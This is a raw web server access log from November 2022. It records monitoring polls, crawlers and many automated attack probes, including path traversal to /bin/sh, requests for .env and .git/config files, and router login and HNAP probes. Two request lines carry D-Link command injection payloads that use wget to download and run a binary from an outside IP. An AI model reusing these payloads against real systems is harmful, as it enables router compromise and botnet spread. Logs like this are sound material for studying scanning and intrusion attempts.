212.91.246.72 - - [03/Nov/2022:23:37:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:23:38:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.217.75.70 - - [03/Nov/2022:23:38:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
60.217.75.70 - - [03/Nov/2022:23:38:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [03/Nov/2022:23:39:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:23:40:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:23:41:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:23:42:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.251.102.74 - - [03/Nov/2022:23:43:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:23:43:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.54 - - [03/Nov/2022:23:44:16 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Nov/2022:23:44:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.89.196.211 - - [03/Nov/2022:23:45:33 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:23:45:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.89.196.211 - - [03/Nov/2022:23:46:03 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
60.217.75.70 - - [03/Nov/2022:23:46:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
60.217.75.70 - - [03/Nov/2022:23:46:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
60.217.75.70 - - [03/Nov/2022:23:46:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [03/Nov/2022:23:46:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.89.196.211 - - [03/Nov/2022:23:46:49 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [03/Nov/2022:23:47:12 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [03/Nov/2022:23:47:45 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:23:47:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.254.59.113 - - [03/Nov/2022:23:47:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:23:48:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.209.162 - - [03/Nov/2022:23:48:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
152.89.196.211 - - [03/Nov/2022:23:49:44 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:23:49:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:23:50:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.217.75.70 - - [03/Nov/2022:23:51:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [03/Nov/2022:23:51:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.89.196.211 - - [03/Nov/2022:23:52:03 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.61.187.101 - - [03/Nov/2022:23:52:22 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [03/Nov/2022:23:52:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.164.198.212 - - [03/Nov/2022:23:53:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:23:53:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.89.196.211 - - [03/Nov/2022:23:54:19 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:23:54:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.89.196.211 - - [03/Nov/2022:23:54:53 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [03/Nov/2022:23:55:07 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:23:55:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:23:56:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:23:57:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
117.243.202.46 - - [03/Nov/2022:23:58:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:23:58:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:23:59:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.182.160.15 - - [04/Nov/2022:00:00:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
175.10.220.231 - - [04/Nov/2022:00:02:55 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
152.89.196.211 - - [04/Nov/2022:00:06:09 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
205.210.31.54 - - [04/Nov/2022:00:07:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
152.89.196.211 - - [04/Nov/2022:00:08:20 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [04/Nov/2022:00:10:26 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [04/Nov/2022:00:10:52 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [04/Nov/2022:00:12:08 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.61.187.101 - - [04/Nov/2022:00:12:33 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.89.196.211 - - [04/Nov/2022:00:13:41 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.223.232.103 - - [04/Nov/2022:00:13:51 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.223.232.103 - - [04/Nov/2022:00:13:51 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
152.89.196.211 - - [04/Nov/2022:00:16:31 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.227.254.54 - - [04/Nov/2022:00:18:48 +0100] "\x03" 501 316 "-" "-"
185.122.204.30 - - [04/Nov/2022:00:21:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:00:21:10 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [04/Nov/2022:00:21:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:00:21:55 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
152.89.196.211 - - [04/Nov/2022:00:22:34 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.122.204.30 - - [04/Nov/2022:00:22:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:00:22:39 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [04/Nov/2022:00:22:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:00:22:39 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [04/Nov/2022:00:23:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:00:23:42 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
109.206.243.220 - - [04/Nov/2022:00:27:04 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3876.0 Safari/537.36"
139.59.249.120 - - [04/Nov/2022:00:27:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
139.59.249.120 - - [04/Nov/2022:00:27:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
139.59.249.120 - - [04/Nov/2022:00:27:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
152.89.196.211 - - [04/Nov/2022:00:28:27 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [04/Nov/2022:00:29:35 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
120.224.157.8 - - [04/Nov/2022:00:29:55 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
62.138.2.160 - - [04/Nov/2022:00:30:04 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.160 - - [04/Nov/2022:00:30:04 +0100] "GET /sitemap.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
143.198.10.67 - - [04/Nov/2022:00:30:44 +0100] "HEAD /spicons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
161.156.29.33 - - [04/Nov/2022:00:32:23 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://www.xforce-security.com/crawler/)"
161.156.29.33 - - [04/Nov/2022:00:32:23 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://www.xforce-security.com/crawler/)"
161.156.29.33 - - [04/Nov/2022:00:32:23 +0100] "GET /core/common.js HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://www.xforce-security.com/crawler/)"
178.62.212.239 - - [04/Nov/2022:00:34:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.62.212.239 - - [04/Nov/2022:00:34:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.62.212.239 - - [04/Nov/2022:00:34:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
109.145.247.47 - - [04/Nov/2022:00:35:18 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
59.187.205.166 - - [04/Nov/2022:00:35:21 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
45.61.187.101 - - [04/Nov/2022:00:36:18 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
34.73.2.216 - - [04/Nov/2022:00:38:13 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
34.73.2.216 - - [04/Nov/2022:00:38:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
45.61.187.101 - - [04/Nov/2022:00:40:11 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
87.236.176.47 - - [04/Nov/2022:01:02:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
159.89.167.222 - - [04/Nov/2022:01:10:03 +0100] "3/\xb2\xb3" 501 319 "-" "-"
159.89.167.222 - - [04/Nov/2022:01:10:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.89.167.222 - - [04/Nov/2022:01:10:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.169 - - [04/Nov/2022:01:10:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
31.220.1.83 - - [04/Nov/2022:01:16:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
193.118.53.194 - - [04/Nov/2022:01:17:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
31.220.1.83 - - [04/Nov/2022:01:19:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.227.254.54 - - [04/Nov/2022:01:20:24 +0100] "\x03" 501 316 "-" "-"
205.210.31.132 - - [04/Nov/2022:01:23:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
31.220.1.83 - - [04/Nov/2022:01:25:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [04/Nov/2022:01:29:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
159.65.58.29 - - [04/Nov/2022:01:36:42 +0100] "\x84\x84\x1a\xc6\x10\xec>\x98" 501 326 "-" "-"
159.65.58.29 - - [04/Nov/2022:01:36:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.65.58.29 - - [04/Nov/2022:01:36:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.65.58.29 - - [04/Nov/2022:01:36:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.103.22 - - [04/Nov/2022:01:37:22 +0100] "\xca\x0e" 501 317 "-" "-"
165.22.103.22 - - [04/Nov/2022:01:37:22 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.103.22 - - [04/Nov/2022:01:37:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
136.243.228.193 - - [04/Nov/2022:01:39:41 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
136.243.228.193 - - [04/Nov/2022:01:39:42 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
128.1.248.42 - - [04/Nov/2022:01:39:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.170 - - [04/Nov/2022:01:40:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.122.204.30 - - [04/Nov/2022:01:42:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:01:42:34 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "HELP" 501 319 "-" "-"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800067) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /s/9383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 405 358 "-" "Report Runner"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:54 +0100] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:55 +0100] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1" roughfooted.scan.leakix.org - - [04/Nov/2022:01:42:54 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:55 +0100] "GET /api/search?folderIds=0 HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
139.144.69.48 - - [04/Nov/2022:01:42:55 +0100] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
105.68.212.247 - - [04/Nov/2022:01:43:32 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:32 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:32 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:32 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:32 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:32 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
